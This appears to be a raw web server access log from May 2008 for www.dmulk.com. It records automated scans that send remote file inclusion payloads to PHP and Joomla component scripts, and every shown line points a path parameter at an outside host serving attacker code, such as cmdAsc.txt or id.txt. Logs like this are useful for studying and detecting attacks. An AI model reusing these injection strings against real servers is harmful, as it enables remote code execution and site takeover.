88.198.60.199 - - [24/May/2008:10:53:57 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.198.60.199 - - [24/May/2008:10:53:57 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:10:54:01 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:10:54:01 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:10:54:01 -0700] "GET /logs/access_080128.log/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:10:54:02 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:10:54:02 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:10:54:02 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:10:54:03 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:10:54:04 -0700] "GET /logs/access_080131.log/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:10:54:04 -0700] "GET /logs/access_080212.log/index.php?incl=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:54:06 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:54:07 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:54:07 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:10:54:19 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:10:54:19 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:10:54:28 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:10:54:29 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:54:33 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:54:33 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:54:33 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:54:48 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:54:48 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:54:48 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.87.191.61 - - [24/May/2008:10:54:53 -0700] "GET /logs/access.log/?errors.php?=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [24/May/2008:10:54:54 -0700] "GET /logs/?errors.php?=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.76" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:54:56 -0700] "GET /logs/access_080327.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:54:57 -0700] "GET /logs/access_071224.log//error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:54:57 -0700] "GET //error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:54:57 -0700] "GET /logs//error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.87.191.61 - - [24/May/2008:10:55:02 -0700] "GET /?errors.php?=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [24/May/2008:10:55:02 -0700] "GET /logs/access_080215.log/?errors.php?=http://www.opns.be/images/stories/er.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:55:20 -0700] "GET /logs/access_080211.log//error.php?dir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:55:26 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [24/May/2008:10:56:03 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tenis-prerov.cz/albums/Kanar07/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:56:12 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:56:12 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:56:12 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:10:56:15 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://coprald.sitesled.com/mura??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:56:21 -0700] "GET /logs/access_080201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.34.224.134 - - [24/May/2008:10:56:22 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:10:56:39 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:10:56:39 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:10:56:39 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [24/May/2008:10:56:44 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:10:57:02 -0700] "GET /logs/access_080213.log/joomla/index.php?option=com_restaurante&task=http://coprald.sitesled.com/mura??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:57:21 -0700] "GET /logs/access_080314.log//eva/index.php3?perso=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:57:21 -0700] "GET //eva/index.php3?perso=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [24/May/2008:10:57:21 -0700] "GET /logs//eva/index.php3?perso=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [24/May/2008:10:57:22 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:57:25 -0700] "GET /logs/access_080201.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:57:31 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 48843 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:57:32 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:57:37 -0700] "GET /logs/access_080314.log//eva/index.php3?perso=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:57:37 -0700] "GET //eva/index.php3?perso=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [24/May/2008:10:57:38 -0700] "GET /logs//eva/index.php3?perso=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:57:54 -0700] "GET /logs/access_080201.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:57:55 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:58:00 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 48843 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:58:00 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:58:10 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:58:44 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:10:58:51 -0700] "GET /logs/access_080418.log/index.phpmain.php?x=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:10:58:56 -0700] "GET /logs/index.phpmain.php?x=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.77.90 - - [24/May/2008:10:58:58 -0700] "GET /index.phpmain.php?x=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 5001 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:10:59:09 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.115.26.66 - - [24/May/2008:10:59:39 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.115.26.66 - - [24/May/2008:10:59:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.19.121.124 - - [24/May/2008:10:59:52 -0700] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.19.121.124 - - [24/May/2008:10:59:52 -0700] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:59:55 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:11:00:05 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:11:00:06 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:11:00:23 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:00:24 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.115.26.66 - - [24/May/2008:11:00:47 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.dito.nl/php_content/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:11:01:50 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:11:01:50 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:11:02:11 -0700] "GET /logs/str.php?p=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:11:02:11 -0700] "GET /logs/access_080418.log/index.phpmain.php?x=http://coprald.sitesled.com/mura??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.68.129 - - [24/May/2008:11:02:11 -0700] "GET /str.php?p=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:11:02:17 -0700] "GET /logs/index.phpmain.php?x=http://coprald.sitesled.com/mura??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.218.137.79 - - [24/May/2008:11:02:20 -0700] "GET /index.phpmain.php?x=http://coprald.sitesled.com/mura??? HTTP/1.1" 404 5001 "-" "libwww-perl/5.803" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:11:02:40 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:11:02:43 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:11:02:43 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:11:02:43 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:03:34 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:04:10 -0700] "GET /logs/access.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:04:11 -0700] "GET //index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:04:11 -0700] "GET /logs//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.56.7.131 - - [24/May/2008:11:04:14 -0700] "GET /logs/access_080211.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:11:04:44 -0700] "GET /logs/access_080103.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:04:45 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:11:04:48 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:11:04:48 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:04:54 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:11:04:54 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:04:59 -0700] "GET /logs/access_080215.log//index2.php?mosConfig_live_site=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:11:05:07 -0700] "GET /logs/errors.php?error=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:11:05:07 -0700] "GET /errors.php?error=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:05:10 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:05:11 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:05:11 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:05:15 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:11:05:24 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:11:05:26 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:11:07:05 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:11:07:05 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:11:07:05 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:07:35 -0700] "GET /logs/access.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:07:41 -0700] "GET /logs/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 48843 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:07:43 -0700] "GET /?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:08:07 -0700] "GET /logs/access_080215.log/?errors.php?=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:11:08:22 -0700] "GET //includes/messages.inc.php?include_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:11:08:35 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
